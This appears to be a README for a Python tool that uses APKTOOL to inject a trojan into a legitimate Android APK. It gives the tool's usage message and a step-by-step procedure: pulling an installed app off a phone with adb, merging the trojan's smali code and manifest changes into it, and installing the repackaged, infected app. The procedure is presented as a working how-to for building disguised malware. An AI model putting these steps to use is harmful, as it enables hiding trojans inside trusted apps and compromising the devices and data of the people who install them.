Entire README here https://github.com/remijouannet/trojandroid_app
So this is a python script who use the wonderful APKTOOL to inject the trojan into another APK.
the script unpack the two APK, copy and modify the smali code of the trojan into get10 package, a few modification in the manifest is of course necessary, after this get10 can be repack, install and use without any problem.
the help message of the script
# python mixapk.py -h
usage: mixapk.py [-h] [--apks trojanApk apkToInfect] [--adb]
optional arguments:
-h, --help show this help message and exit
--apks trojanApk apkToInfect specify the Trojan Apk and the APk to Infect
--adb install the final APK with adb
So you have to have the Trojan APK and an APK of another app (get10 for this example) (a little howto I find to extract an installed app of your phone)
# ./adb shell pm list packages | grep get10
# ./adb shell pm path com.remijouannet.get10
# ./adb pull /data/app/com.remijouannet.get10-1/base.apk && mv base.apk /tmp/
7544 KB/s (3117111 bytes in 0.403s)
# mixapk.py --apks /PathTotrojandroid_app/app/build/outputs/apk/app-debug.apk /tmp/base.apk
let's do the magic. if you didn't have any errors, you should find a file "app-final.pak" in your current directory.
if you have your phone in debug mode, you can push the apk to it with a simple adb command:
# adb install app-final.apk